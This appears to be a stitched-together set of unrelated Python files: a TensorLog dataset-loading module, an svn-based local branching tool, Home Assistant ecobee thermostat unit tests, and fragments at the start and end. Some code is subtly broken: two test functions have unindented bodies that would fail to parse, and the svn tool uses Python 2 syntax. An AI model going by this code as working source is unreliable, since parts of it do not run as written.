    import sys
    run_from_args(sys.argv[1:])
|
|
# (C) William W. Cohen and Carnegie Mellon University, 2016
import sys
import re
import math
import os.path
import collections
import scipy.sparse as SS
import scipy.io as SIO
import numpy as NP
import numpy.random as NR
import logging
from tensorlog import config
from tensorlog import mutil
from tensorlog import matrixdb
from tensorlog import declare
from tensorlog import util
# Module-level configuration knobs for dataset loading (see loadExamples).
conf = config.Config()
conf.normalize_outputs = True; conf.help.normalize_outputs = "In .exam files, l1-normalize the weights of valid outputs"
#
# dealing with labeled training data
#
class Dataset(object):
  """Labeled training data for one or more predicate modes.

  Examples are held as parallel scipy sparse matrices: for each mode,
  row i of the X matrix is the (one-hot) input of example i and row i of
  the Y matrix holds the desired outputs for that input.
  """

  def __init__(self,xDict,yDict):
    # dict which maps mode declaration to X matrices for training
    self.xDict = xDict
    # likewise for Y matrices
    self.yDict = yDict

  def isSinglePredicate(self):
    """Returns true if all the examples are for a single predicate."""
    return len(list(self.xDict.keys()))==1

  def extractMode(self,mode):
    """Return a new Dataset that just contains this mode."""
    assert mode in self.xDict, 'dataset does not contain mode %s' % str(mode)
    return Dataset({mode:self.xDict[mode]}, {mode:self.yDict[mode]})

  def modesToLearn(self):
    """Return list of modes associated with the data."""
    return list(self.xDict.keys())

  def hasMode(self,mode):
    """True if there are examples of the mode in the dataset."""
    return (mode in self.yDict and mode in self.xDict)

  def getX(self,mode):
    """Get a matrix of all inputs for the mode."""
    return self.xDict[mode]

  def getY(self,mode):
    """Get a matrix of all desired outputs for the mode."""
    return self.yDict[mode]

  def size(self):
    """Total number of non-zeros over all X and Y matrices."""
    return sum([m.nnz for m in list(self.xDict.values())]) + sum([m.nnz for m in list(self.yDict.values())])

  def shuffle(self):
    """Randomly permute example rows, keeping each X row paired with its Y row."""
    for mode in self.xDict:
      shuffledRowNums = NP.arange(mutil.numRows(self.xDict[mode]))
      NR.shuffle(shuffledRowNums)
      self.xDict[mode] = mutil.shuffleRows(self.xDict[mode],shuffledRowNums)
      self.yDict[mode] = mutil.shuffleRows(self.yDict[mode],shuffledRowNums)

  def minibatchIterator(self,batchSize=100,shuffleFirst=True):
    """Iterate over triples (mode,X',Y') where X' and Y' are sets of
    batchSize rows from the full data for mode, randomly selected
    (without replacement) from the dataset."""
    # randomize the order of the examples
    if shuffleFirst: self.shuffle()
    # then sample an ordering of the modes
    modeList = self.modesToLearn()
    modeSampleDict = {}
    for modeIndex,mode in enumerate(modeList):
      # one entry in the sample list per batch this mode will contribute
      numBatches = int(math.ceil( mutil.numRows(self.getX(mode)) / float(batchSize) ))
      modeSampleDict[mode] = NP.ones(numBatches,dtype='int')*modeIndex
    modeSamples = NP.concatenate(list(modeSampleDict.values()))
    NR.shuffle(modeSamples)
    # finally produce the minibatches
    currentOffset = [0] * len(modeList)
    for modeIndex in modeSamples:
      mode = modeList[modeIndex]
      lo = currentOffset[modeIndex]
      # the last batch of a mode may be smaller than batchSize
      bX = mutil.selectRows(self.getX(mode),lo,lo+batchSize)
      bY = mutil.selectRows(self.getY(mode),lo,lo+batchSize)
      currentOffset[modeIndex] += batchSize
      yield mode,bX,bY

  def pprint(self):
    """One human-readable summary line per mode."""
    return ['%s: X %s Y %s' % (str(mode),mutil.pprintSummary(self.xDict[mode]),mutil.pprintSummary(self.yDict[mode])) for mode in self.xDict]

  #
  # i/o and conversions
  #

  def serialize(self,dir):
    """Save the dataset on disk."""
    if not os.path.exists(dir):
      os.mkdir(dir)
    # savemat requires string keys, so modes are stringified here and
    # parsed back in deserialize()
    dx = dict([(str(k_v[0]),k_v[1]) for k_v in list(self.xDict.items())])
    dy = dict([(str(k_v[0]),k_v[1]) for k_v in list(self.yDict.items())])
    SIO.savemat(os.path.join(dir,"xDict"),dx,do_compression=True)
    SIO.savemat(os.path.join(dir,"yDict"),dy,do_compression=True)

  @staticmethod
  def deserialize(dir):
    """Recover a saved dataset."""
    logging.info('deserializing dataset file '+ dir)
    xDict = {}
    yDict = {}
    SIO.loadmat(os.path.join(dir,"xDict"),xDict)
    SIO.loadmat(os.path.join(dir,"yDict"),yDict)
    #serialization converts modes to strings so convert them
    #back.... it also converts matrices to csr
    for d in (xDict,yDict):
      for stringKey,mat in list(d.items()):
        del d[stringKey]
        # loadmat also injects bookkeeping keys like '__header__'; skip them
        if not stringKey.startswith('__'):
          d[declare.asMode(stringKey)] = SS.csr_matrix(mat)
    dset = Dataset(xDict,yDict)
    logging.info('deserialized dataset has %d modes and %d non-zeros' % (len(dset.modesToLearn()), dset.size()))
    return dset

  @staticmethod
  def uncacheExamples(dsetFile,db,exampleFile,proppr=True):
    """Build a dataset file from an examples file, serialize it, and
    return the de-serialized dataset.  Or if that's not necessary,
    just deserialize it.
    """
    # rebuild when the cache is missing or older than the examples file
    if not os.path.exists(dsetFile) or os.path.getmtime(exampleFile)>os.path.getmtime(dsetFile):
      logging.info('serializing examples in %s to %s' % (exampleFile,dsetFile))
      dset = Dataset.loadExamples(db,exampleFile,proppr=proppr)
      dset.serialize(dsetFile)
      os.utime(dsetFile,None) #update the modification time for the directory
      return dset
    else:
      return Dataset.deserialize(dsetFile)

  @staticmethod
  def uncacheMatrix(dsetFile,db,functorToLearn,functorInDB):
    """Build a dataset file from a DB matrix as specified with loadMatrix
    and serialize it.  Or if that's not necessary, just
    deserialize it.
    """
    if not os.path.exists(dsetFile):
      print(('preparing examples from',functorToLearn,'...'))
      dset = Dataset.loadMatrix(db,functorToLearn,functorInDB)
      print(('serializing dsetFile',dsetFile,'...'))
      dset.serialize(dsetFile)
      return dset
    else:
      print(('de-serializing dsetFile',dsetFile,'...'))
      return Dataset.deserialize(dsetFile)

  # TODO remove or make type-aware
  @staticmethod
  def loadMatrix(db,functorToLearn,functorInDB):
    """Convert a DB matrix containing pairs x,f(x) to training data for a
    learner.  For each row x with non-zero entries, copy that row
    to Y, and and also append a one-hot representation of x to the
    corresponding row of X.
    """
    assert db.isTypeless(),'cannot run loadMatrix on database with defined types'
    functorToLearn = declare.asMode(functorToLearn)
    xrows = []
    yrows = []
    m = db.matEncoding[(functorInDB,2)].tocoo()
    n = db.dim()
    for i in range(len(m.data)):
      x = m.row[i]
      xrows.append(SS.csr_matrix( ([1.0],([0],[x])), shape=(1,n) ))
      # l1-normalize the copied row so each example's outputs sum to 1
      rx = m.getrow(x)
      yrows.append(rx * (1.0/rx.sum()))
    return Dataset({functorToLearn:mutil.stack(xrows)},{functorToLearn:mutil.stack(yrows)})

  @staticmethod
  def _parseLine(line,proppr=True):
    #returns mode, x, positive y's where x and ys are symbols
    # blank lines and comments yield a (None,None,None) triple
    if not line.strip() or line[0]=='#':
      return None,None,None
    parts = line.strip().split("\t")
    if not proppr:
      # .exam format: functor <TAB> x <TAB> y1 ... yk
      assert len(parts)>=2, 'bad line: %r parts %r' % (line,parts)
      return declare.asMode(parts[0]+"/io"),parts[1],parts[2:]
    else:
      # proppr .examples format: pred(x,Q) <TAB> [+|-]pred(x,y) ...
      regex = re.compile('(\w+)\((\w+),(\w+)\)')
      mx = regex.search(parts[0])
      if not mx:
        return None,None,None
      else:
        mode = declare.asMode(mx.group(1)+"/io")
        x = mx.group(2)
        pos = []
        for ans in parts[1:]:
          # leading '+' or '-' marks the label; only positives are kept
          label = ans[0]
          my = regex.search(ans[1:])
          assert my,'problem at line '+line
          assert my.group(1)==mode.functor,'mismatched modes %s %s at line %s' % (my.group(1),mode,line)
          assert my.group(2)==x,'mismatched x\'s at line '+line
          if label=='+':
            pos.append(my.group(3))
        return mode,x,pos

  @staticmethod
  def loadProPPRExamples(db,fileName):
    """Convert a proppr-style foo.examples file to a two dictionaries of
    modename->matrix pairs, one for the Xs, one for the Ys"""
    return Dataset.loadExamples(db,fileName,proppr=True)

  @staticmethod
  def loadExamples(db,fileName,proppr=False):
    """Convert foo.exam file, where each line is of the form

      functor <TAB> x <TAB> y1 ... yk

    to two dictionaries of modename->matrix pairs, one for the Xs,
    one for the Ys.
    """
    logging.info('loading examples from '+ str(fileName))
    # map from relation to lists that buffer data,row
    # index,colindex information for each of the X,Y matrices
    xDatabuf = collections.defaultdict(list)
    xRowbuf = collections.defaultdict(list)
    xColbuf = collections.defaultdict(list)
    yDatabuf = collections.defaultdict(list)
    yRowbuf = collections.defaultdict(list)
    yColbuf = collections.defaultdict(list)
    xsResult = {}
    ysResult = {}
    def getId(typeName,symbol):
      # unknown symbols are mapped to the out-of-vocabulary entity id
      s = symbol if db.schema.hasId(typeName,symbol) else matrixdb.OOV_ENTITY_NAME
      return db.schema.getId(typeName,s)
    for line in util.linesIn(fileName):
      pred,x,ys = Dataset._parseLine(line,proppr=proppr)
      if pred:
        xType = db.schema.getDomain(pred.getFunctor(),2)
        yType = db.schema.getRange(pred.getFunctor(),2)
        row_index = len(xDatabuf[pred])
        # X row is one-hot on x's id
        xDatabuf[pred].append(1.0)
        xRowbuf[pred].append(row_index)
        xColbuf[pred].append(getId(xType,x))
        for y in ys:
          # optionally l1-normalize output weights (see conf above)
          yDatabuf[pred].append( 1.0/len(ys) if conf.normalize_outputs else 1.0)
          yRowbuf[pred].append(row_index)
          yColbuf[pred].append(getId(yType,y))
    # flush the buffers into csr matrices, one X,Y pair per mode
    for pred in list(xDatabuf.keys()):
      xType = db.schema.getDomain(pred.getFunctor(),2)
      yType = db.schema.getRange(pred.getFunctor(),2)
      nrows = len(xDatabuf[pred])
      coo_x = SS.coo_matrix((xDatabuf[pred],(xRowbuf[pred],xColbuf[pred])), shape=(nrows,db.dim(xType)))
      xsResult[pred] = SS.csr_matrix(coo_x,dtype='float32')
      coo_y = SS.coo_matrix((yDatabuf[pred],(yRowbuf[pred],yColbuf[pred])), shape=(nrows,db.dim(yType)))
      ysResult[pred] = SS.csr_matrix(coo_y,dtype='float32')
    dset = Dataset(xsResult,ysResult)
    logging.info('loaded dataset has %d modes and %d non-zeros' % (len(dset.modesToLearn()), dset.size()))
    logging.info('in loaded dataset, example normalization (so sum_{y} score[pred(x,y)] == 1) is %r' % conf.normalize_outputs)
    return dset

  #TODO refactor to also save examples in form: 'functor X Y1
  #... Yk'
  def saveProPPRExamples(self,fileName,db,append=False,mode=None):
    """Convert X and Y to ProPPR examples and store in a file."""
    fp = open(fileName,'a' if append else 'w')
    modeKeys = [mode] if mode else list(self.xDict.keys())
    for mode in modeKeys:
      assert mode in self.yDict, "No mode '%s' in yDict" % mode
      functor,arity = mode.getFunctor(),mode.getArity()
      dx = db.matrixAsSymbolDict(self.xDict[mode],db.schema.getDomain(functor,arity))
      dy = db.matrixAsSymbolDict(self.yDict[mode],db.schema.getRange(functor,arity))
      theoryPred = mode.functor
      for i in range(max(dx.keys())+1):
        dix = dx[i]
        diy = dy[i]
        # each X row must be one-hot so it names a single query constant
        assert len(list(dix.keys()))==1,'X row %d is not onehot: %r' % (i,dix)
        x = list(dix.keys())[0]
        fp.write('%s(%s,Y)' % (theoryPred,x))
        for y in list(diy.keys()):
          fp.write('\t+%s(%s,%s)' % (theoryPred,x,y))
        fp.write('\n')
if __name__ == "__main__":
  # CLI: convert a matrix database plus an example file into a serialized
  # Dataset directory.
  usage = 'usage: python -m dataset.py --serialize foo.cfacts|foo.db bar.exam|bar.examples glob.dset'
  if sys.argv[1]=='--serialize':
    assert len(sys.argv)==5,usage
    dbFile,examFile,dsetFile = sys.argv[2:5]
    if dbFile.endswith(".cfacts"):
      db = matrixdb.MatrixDB.loadFile(dbFile)
    elif dbFile.endswith(".db"):
      db = matrixdb.MatrixDB.deserialize(dbFile)
    else:
      assert False,usage
    assert examFile.endswith(".examples") or examFile.endswith(".exam"),usage
    isProppr = examFile.endswith(".examples")
    Dataset.loadExamples(db,examFile,proppr=isProppr).serialize(dsetFile)
|
|
# Copyright 2015, The Lvn Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
import logging
import os
import sys
import subprocess
import tempfile
_logger = logging.getLogger(__name__)
class Branch(object):
  """A named branch whose uncommitted work may be saved as a patch file."""

  def __init__(self, name, json_object=None):
    self.name = name
    self.patch_file = None
    if json_object is not None:
      # json_object comes from lvn.json; 'patch_file' is optional.
      self.patch_file = json_object.get('patch_file')

  def ToJson(self):
    """Serialize to a plain dict; patch_file is included only when set."""
    if self.patch_file is None:
      return {}
    return {'patch_file': self.patch_file}

  def Rename(self, patch_dir, name):
    """Rename the branch, moving its patch file (if any) to match."""
    self.name = name
    if self.patch_file is None:
      return
    renamed = name + '.patch'
    os.rename(os.path.join(patch_dir, self.patch_file),
              os.path.join(patch_dir, renamed))
    self.patch_file = renamed
class Lvn(object):
  """Local-branch ("lvn") state layered over an svn checkout.

  Branch metadata is stored in <checkout>/.svn/lvn/lvn.json; each
  branch's uncommitted work is a patch file in the same directory.
  NOTE(review): this module uses Python 2 syntax (iteritems, old-style
  except) and treats subprocess output as str.
  """

  def __init__(self, lvn_file=None):
    # No backing file: fresh state with a single default branch.
    if lvn_file is None:
      self.current_branch = 'master-1'
      self.branches = {}
      self.branches[self.current_branch] = Branch(self.current_branch)
      return
    # Directory layout derived from the lvn.json path:
    #   lvn_dir = .../.svn/lvn, svn_dir = .../.svn,
    #   tmp_dir = .../.svn/tmp, top_dir = checkout root.
    self.lvn_dir, _ = os.path.split(lvn_file)
    self.svn_dir = os.path.abspath(os.path.join(self.lvn_dir, '..'))
    self.tmp_dir = os.path.join(self.svn_dir, 'tmp')
    self.top_dir = os.path.abspath(os.path.join(self.lvn_dir, '..', '..'))
    with open(lvn_file, 'r') as lvn_json_file:
      json_obj = json.loads(lvn_json_file.read())
    self.current_branch = json_obj['current_branch']
    self.branches = {}
    for key, value in json_obj['branches'].iteritems():
      self.branches[key] = Branch(key, value)

  def Save(self, lvn_file=None):
    """Write the current state back to lvn.json (or to lvn_file)."""
    if lvn_file is None:
      lvn_file = os.path.join(self.lvn_dir, 'lvn.json')
    json_obj = {}
    json_obj['current_branch'] = self.current_branch
    branches = {}
    for key, branch in self.branches.iteritems():
      branches[key] = branch.ToJson()
    json_obj['branches'] = branches
    with open(lvn_file, 'w') as lvn_json_file:
      json.dump(json_obj, lvn_json_file)

  def RenameBranch(self, old_name, new_name):
    """Rename a branch (and its patch file), tracking the current branch."""
    branch = self.branches[old_name]
    del self.branches[old_name]
    branch.Rename(self.lvn_dir, new_name)
    self.branches[new_name] = branch
    if self.current_branch == old_name:
      self.current_branch = new_name

  def SaveCurrentBranch(self):
    """Snapshot the working tree's `svn diff` into the branch's patch file."""
    _logger.debug('Saving current patch')
    branch = self.branches[self.current_branch]
    if branch.patch_file is None:
      branch.patch_file = branch.name + '.patch'
    with open(os.path.join(self.lvn_dir, branch.patch_file), 'w') as patch_file:
      ret = subprocess.call(['svn', 'diff'], cwd=self.top_dir, stdout=patch_file)
      if ret != 0:
        raise Exception('svn diff failed')

  def Revert(self):
    """Discard local modifications, deleting files added since last commit."""
    _logger.debug('Reverting changes')
    p = subprocess.Popen(['svn', 'status'], cwd=self.top_dir, stdout=subprocess.PIPE)
    added = []
    for line in p.stdout:
      if line.startswith('A'):
        # paths start at column 8 of `svn status` output
        added.append(line[8:].strip())
    if p.wait() != 0:
      raise Exception('svn status failed')
    ret = subprocess.call(['svn', 'revert', '-R', self.top_dir], cwd=self.top_dir)
    if ret != 0:
      raise Exception('svn revert failed')
    # Remove added entries in reverse (deepest-first) order so that
    # directories are empty by the time rmdir reaches them.
    for p in reversed(added):
      p = os.path.join(self.top_dir, p)
      try:
        if os.path.isdir(p):
          sys.stderr.write('Removing dir %r\n' % p)
          os.rmdir(p)
        else:
          sys.stderr.write('Removing file %r\n' % p)
          os.unlink(p)
      except OSError, e:
        # best-effort cleanup: report the failure and keep going
        sys.stderr.write(str(e) + '\n')

  def RestoreBranch(self):
    """Re-apply the current branch's saved patch to the working tree."""
    _logger.debug('Restoring changes from patch')
    branch = self.branches[self.current_branch]
    if branch.patch_file is None:
      return
    patch_file_name = os.path.join(self.lvn_dir, branch.patch_file)
    ret = subprocess.call(['svn', 'patch', patch_file_name], cwd=self.top_dir)
    if ret != 0:
      raise Exception('svn apply failed')

  def Delete(self, branch_name):
    """Forget a branch and remove its patch file, if any."""
    branch = self.branches[branch_name]
    del self.branches[branch_name]
    if branch.patch_file is not None:
      os.remove(os.path.join(self.lvn_dir, branch.patch_file))

  def SaveNonTracked(self):
    """Saves non-tracked files and directories to an archive."""
    _logger.debug('Archiving non-tracked files')
    p = subprocess.Popen(['svn', 'status'], cwd=self.top_dir, stdout=subprocess.PIPE)
    paths = []
    for line in p.stdout:
      if line.startswith('?'):
        paths.append(line[8:].strip())
    if p.wait() != 0:
      raise Exception('svn status failed')
    if not paths:
      _logger.debug('No non-tracked files')
      return None
    archive_fd, archive_name = tempfile.mkstemp(dir=self.tmp_dir, suffix='.cpio')
    _logger.debug('Archive name: %r', archive_name)
    try:
      # `find` enumerates the non-tracked paths recursively; `cpio -o`
      # archives that listing from its stdin.
      cmd_find = ['find']
      cmd_find.extend(paths)
      p_find = subprocess.Popen(cmd_find, cwd=self.top_dir, stdout=subprocess.PIPE)
      cmd_cpio = ['cpio', '-o']
      p_cpio = subprocess.Popen(cmd_cpio, cwd=self.top_dir, stdin=p_find.stdout, stdout=archive_fd)
    finally:
      # the child inherited the fd; the parent's copy can be closed now
      os.close(archive_fd)
    if p_find.wait() != 0:
      raise Exception('find failed')
    if p_cpio.wait() != 0:
      raise Exception('cpio failed')
    return archive_name

  def Clean(self):
    """Removes non-tracked files and dirs from working tree."""
    _logger.debug('Cleaning non-tracked files')
    p = subprocess.Popen(['svn', 'status'], cwd=self.top_dir, stdout=subprocess.PIPE)
    paths = []
    for line in p.stdout:
      if line.startswith('?'):
        paths.append(line[8:].strip())
    if p.wait() != 0:
      raise Exception('svn status failed')
    if not paths:
      _logger.debug('No non-tracked files')
      return
    # `find ... -delete` removes files before their parent directories
    cmd_find = ['find']
    cmd_find.extend(paths)
    cmd_find.append('-delete')
    p_find = subprocess.Popen(cmd_find, cwd=self.top_dir)
    if p_find.wait() != 0:
      raise Exception('find failed')

  def RestoreNonTracked(self, archive_name):
    """Unpack an archive made by SaveNonTracked back into the tree."""
    _logger.debug('Restoring non-tracked files')
    if not (archive_name and os.path.exists(archive_name)):
      _logger.debug('No archive. Skipping restoring non-tracked files')
      return
    # cpio -i extracts, -d creates leading directories as needed
    cmd_cpio = ['cpio', '-i', '-d']
    with open(archive_name, 'rb') as archive:
      p_cpio = subprocess.Popen(cmd_cpio, cwd=self.top_dir, stdin=archive, stderr=open(os.devnull, 'wb'))
      if p_cpio.wait() != 0:
        raise Exception('cpio failed')
    os.remove(archive_name)
def GetSvnDir(working_dir):
  """Walk up from working_dir looking for a .svn directory.

  Returns the path of the nearest enclosing .svn directory, or None when
  the search bottoms out at the filesystem root or an empty path.
  """
  # BUG FIX: the loop used to compare against ' ' (a single space), which
  # os.path.split never produces.  For a relative path with no .svn
  # ancestor, split('x') -> ('', 'x') and split('') -> ('', ''), so the
  # old loop never terminated.  Stop on the empty string instead.
  while working_dir and working_dir != '/':
    svn_dir = os.path.join(working_dir, '.svn')
    if os.path.isdir(svn_dir):
      return svn_dir
    working_dir, _ = os.path.split(working_dir)
  return None
def GetLvnDir(working_dir):
  """Return the 'lvn' directory inside the enclosing .svn dir, or None."""
  svn_dir = GetSvnDir(working_dir)
  if svn_dir is None:
    return None
  lvn_dir = os.path.join(svn_dir, 'lvn')
  return lvn_dir if os.path.isdir(lvn_dir) else None
def GetLvn(working_dir):
  """Locate and load the Lvn state for the checkout containing working_dir.

  Prints a diagnostic and returns None when there is no svn checkout or
  lvn has not been initialized; otherwise returns a Lvn instance.
  """
  svn_dir = GetSvnDir(working_dir)
  if svn_dir is None:
    print 'svn repository not found'
    return None
  lvn_dir = os.path.join(svn_dir, 'lvn')
  if not os.path.isdir(lvn_dir):
    print 'lvn is not initialized, run lvn init'
    return None
  # the directory may exist without the state file (partial init)
  lvn_file = os.path.join(lvn_dir, 'lvn.json')
  if not os.path.exists(lvn_file):
    print 'lvn is not initialized, run lvn init'
    return None
  return Lvn(lvn_file)
|
|
"""The test for the Ecobee thermostat module."""
from unittest import mock
import pytest
from homeassistant.components.ecobee import climate as ecobee
import homeassistant.const as const
from homeassistant.const import STATE_OFF
@pytest.fixture
def ecobee_fixture():
    """Set up ecobee mock."""
    # Raw thermostat data shaped like the ecobee API response.  Runtime
    # temperatures appear to be tenths of a degree (300 reads back as
    # 30.0 in the tests below) -- confirm against the climate module.
    vals = {
        "name": "Ecobee",
        "program": {
            "climates": [
                {"name": "Climate1", "climateRef": "c1"},
                {"name": "Climate2", "climateRef": "c2"},
            ],
            "currentClimateRef": "c1",
        },
        "runtime": {
            "actualTemperature": 300,
            "actualHumidity": 15,
            "desiredHeat": 400,
            "desiredCool": 200,
            "desiredFanMode": "on",
        },
        "settings": {
            "hvacMode": "auto",
            "heatStages": 1,
            "coolStages": 1,
            "fanMinOnTime": 10,
            "heatCoolMinDelta": 50,
            "holdAction": "nextTransition",
        },
        "equipmentStatus": "fan",
        "events": [
            {
                "name": "Event1",
                "running": True,
                "type": "hold",
                "holdClimateRef": "away",
                "endDate": "2017-01-01 10:00:00",
                "startDate": "2017-02-02 11:00:00",
            }
        ],
    }
    # Route item access through the dict so tests can mutate `vals` and
    # observe the change via the mock.
    mock_ecobee = mock.Mock()
    mock_ecobee.__getitem__ = mock.Mock(side_effect=vals.__getitem__)
    mock_ecobee.__setitem__ = mock.Mock(side_effect=vals.__setitem__)
    return mock_ecobee
@pytest.fixture(name="data")
def data_fixture(ecobee_fixture):
    """Set up data mock."""
    # Any thermostat lookup on the shim returns the mocked ecobee device.
    shim = mock.Mock()
    shim.ecobee.get_thermostat.return_value = ecobee_fixture
    return shim
@pytest.fixture(name="thermostat")
def thermostat_fixture(data):
    """Set up ecobee thermostat object."""
    # Index 1 selects the mocked device registered on the data fixture.
    thermostat_index = 1
    return ecobee.Thermostat(data, thermostat_index)
async def test_name(thermostat):
"""Test name property."""
assert thermostat.name == "Ecobee"
async def test_current_temperature(ecobee_fixture, thermostat):
    """Test current temperature.

    Runtime temperatures are tenths of a degree: 300 reads back as 30.
    """
    assert thermostat.current_temperature == 30
    # Use the plain number 404: the previous code reached for
    # const.HTTP_NOT_FOUND, but an HTTP status constant has nothing to do
    # with a temperature reading and only obscured the intent.
    ecobee_fixture["runtime"]["actualTemperature"] = 404
    assert thermostat.current_temperature == 40.4
async def test_target_temperature_low(ecobee_fixture, thermostat):
    """Test target low temperature."""
    # Fixture desiredHeat of 400 (tenths of a degree) reads back as 40.
    assert thermostat.target_temperature_low == 40
    ecobee_fixture["runtime"]["desiredHeat"] = 502
    updated_low = thermostat.target_temperature_low
    assert updated_low == 50.2
async def test_target_temperature_high(ecobee_fixture, thermostat):
    """Test target high temperature."""
    # Fixture desiredCool of 200 (tenths of a degree) reads back as 20.
    assert thermostat.target_temperature_high == 20
    ecobee_fixture["runtime"]["desiredCool"] = 103
    updated_high = thermostat.target_temperature_high
    assert updated_high == 10.3
async def test_target_temperature(ecobee_fixture, thermostat):
    """Test target temperature."""
    # No single setpoint while in auto mode.
    assert thermostat.target_temperature is None
    # Heating modes report the heat setpoint, cooling the cool setpoint.
    for hvac_mode, expected in (
        ("heat", 40),
        ("cool", 20),
        ("auxHeatOnly", 40),
    ):
        ecobee_fixture["settings"]["hvacMode"] = hvac_mode
        assert thermostat.target_temperature == expected
    ecobee_fixture["settings"]["hvacMode"] = "off"
    assert thermostat.target_temperature is None
async def test_desired_fan_mode(ecobee_fixture, thermostat):
    """Test desired fan mode property."""
    assert thermostat.fan_mode == "on"
    ecobee_fixture["runtime"]["desiredFanMode"] = "auto"
    updated_mode = thermostat.fan_mode
    assert updated_mode == "auto"
async def test_fan(ecobee_fixture, thermostat):
    """Test fan property."""
    # Fixture equipmentStatus is "fan", so the fan reports on.
    assert thermostat.fan == const.STATE_ON
    # Without "fan" in the equipment status the fan reports off.
    for status in ("", "heatPump, heatPump2"):
        ecobee_fixture["equipmentStatus"] = status
        assert thermostat.fan == STATE_OFF
async def test_hvac_mode(ecobee_fixture, thermostat):
    """Test current operation property."""
    # Fixture starts in ecobee "auto", which maps to HA "heat_cool".
    assert thermostat.hvac_mode == "heat_cool"
    for ecobee_mode, ha_mode in (
        ("heat", "heat"),
        ("cool", "cool"),
        ("auxHeatOnly", "heat"),
        ("off", "off"),
    ):
        ecobee_fixture["settings"]["hvacMode"] = ecobee_mode
        assert thermostat.hvac_mode == ha_mode
async def test_hvac_modes(thermostat):
"""Test operation list property."""
assert ["heat_cool", "heat", "cool", "off"] == thermostat.hvac_modes
async def test_hvac_mode2(ecobee_fixture, thermostat):
    """Test operation mode property."""
    initial_mode = thermostat.hvac_mode
    assert initial_mode == "heat_cool"
    ecobee_fixture["settings"]["hvacMode"] = "heat"
    assert thermostat.hvac_mode == "heat"
async def test_extra_state_attributes(ecobee_fixture, thermostat):
    """Test device state attributes property."""

    def expected(climate_mode, equipment_running):
        # Every scenario shares the fan/fan_min_on_time values from the
        # fixture; only climate mode and equipment status vary.
        return {
            "fan": "off",
            "climate_mode": climate_mode,
            "fan_min_on_time": 10,
            "equipment_running": equipment_running,
        }

    # The equipment status string is passed through verbatim, including
    # empty and unrecognized values.
    for status in ("heatPump2", "auxHeat2", "compCool1", "", "Unknown"):
        ecobee_fixture["equipmentStatus"] = status
        assert thermostat.extra_state_attributes == expected("Climate1", status)

    # Switching the current climate reference updates the climate mode name.
    ecobee_fixture["program"]["currentClimateRef"] = "c2"
    assert thermostat.extra_state_attributes == expected("Climate2", "Unknown")
async def test_is_aux_heat_on(ecobee_fixture, thermostat):
    """Test aux heat property."""
    # "auxHeat" appearing in equipmentStatus flips the property on.
    for status, expected in (("fan", False), ("fan, auxHeat", True)):
        ecobee_fixture["equipmentStatus"] = status
        assert bool(thermostat.is_aux_heat) == expected
async def test_set_temperature(ecobee_fixture, thermostat, data):
    """Test set temperature.

    Exercises the mode/argument combinations of set_temperature and
    verifies the hold-temperature API call (or its absence).
    """
    # Auto -> Auto
    data.reset_mock()
    thermostat.set_temperature(target_temp_low=20, target_temp_high=30)
    data.ecobee.set_hold_temp.assert_has_calls(
        [mock.call(1, 30, 20, "nextTransition", None)]
    )
    # Auto -> Hold
    # A single setpoint in auto mode becomes a hold with a band around it
    # (25/15 here -- presumably derived from heatCoolMinDelta=50 in the
    # fixture; confirm in the climate implementation).
    data.reset_mock()
    thermostat.set_temperature(temperature=20)
    data.ecobee.set_hold_temp.assert_has_calls(
        [mock.call(1, 25, 15, "nextTransition", None)]
    )
    # Cool -> Hold
    data.reset_mock()
    ecobee_fixture["settings"]["hvacMode"] = "cool"
    thermostat.set_temperature(temperature=20.5)
    data.ecobee.set_hold_temp.assert_has_calls(
        [mock.call(1, 20.5, 20.5, "nextTransition", None)]
    )
    # Heat -> Hold
    data.reset_mock()
    ecobee_fixture["settings"]["hvacMode"] = "heat"
    thermostat.set_temperature(temperature=20)
    data.ecobee.set_hold_temp.assert_has_calls(
        [mock.call(1, 20, 20, "nextTransition", None)]
    )
    # Heat -> Auto
    # Range arguments outside auto mode are ignored: no API call expected.
    data.reset_mock()
    ecobee_fixture["settings"]["hvacMode"] = "heat"
    thermostat.set_temperature(target_temp_low=20, target_temp_high=30)
    assert not data.ecobee.set_hold_temp.called
async def test_set_hvac_mode(thermostat, data):
    """Test operation mode setter."""
    # HA "heat_cool" translates to the ecobee API mode "auto".
    for requested, api_mode in (("heat_cool", "auto"), ("heat", "heat")):
        data.reset_mock()
        thermostat.set_hvac_mode(requested)
        data.ecobee.set_hvac_mode.assert_has_calls([mock.call(1, api_mode)])
async def test_set_fan_min_on_time(thermostat, data):
    """Test fan min on time setter."""
    # The minutes value is forwarded to the API unchanged.
    for minutes in (15, 20):
        data.reset_mock()
        thermostat.set_fan_min_on_time(minutes)
        data.ecobee.set_fan_min_on_time.assert_has_calls([mock.call(1, minutes)])
async def test_resume_program(thermostat, data):
    """Test resume program."""
    # Falsy arguments are forwarded as the string "false", truthy as "true".
    for arg, forwarded in (
        (False, "false"),
        (None, "false"),
        (0, "false"),
        (True, "true"),
        (1, "true"),
    ):
        data.reset_mock()
        thermostat.resume_program(arg)
        data.ecobee.resume_program.assert_has_calls([mock.call(1, forwarded)])
async def test_hold_preference(ecobee_fixture, thermostat):
    """Test hold preference."""
    # "indefinite" passes through; timed holds collapse to "holdHours";
    # everything else falls back to "nextTransition".
    for action, preference in (
        ("indefinite", "indefinite"),
        ("useEndTime2hour", "holdHours"),
        ("useEndTime4hour", "holdHours"),
        ("nextPeriod", "nextTransition"),
        ("askMe", "nextTransition"),
    ):
        ecobee_fixture["settings"]["holdAction"] = action
        assert thermostat.hold_preference() == preference
def test_hold_hours(ecobee_fixture, thermostat):
    """Test hold hours preference."""
    # NOTE(review): unlike its siblings this test is not async --
    # presumably intentional, but worth confirming.
    for action, hours in (("useEndTime2hour", 2), ("useEndTime4hour", 4)):
        ecobee_fixture["settings"]["holdAction"] = action
        assert thermostat.hold_hours() == hours
    # Actions without a duration yield no hold hours at all.
    for action in ("nextPeriod", "indefinite", "askMe"):
        ecobee_fixture["settings"]["holdAction"] = action
        assert thermostat.hold_hours() is None
async def test_set_fan_mode_on(thermostat, data):
    """Test set fan mode to on."""
    data.reset_mock()
    thermostat.set_fan_mode("on")
    expected_call = mock.call(1, "on", 20, 40, "nextTransition")
    data.ecobee.set_fan_mode.assert_has_calls([expected_call])
async def test_set_fan_mode_auto(thermostat, data):
    """Test set fan mode to auto."""
    data.reset_mock()
    thermostat.set_fan_mode("auto")
    expected_call = mock.call(1, "auto", 20, 40, "nextTransition")
    data.ecobee.set_fan_mode.assert_has_calls([expected_call])
|
|
"""
============================
``ctypes`` Utility Functions
============================
See Also
---------
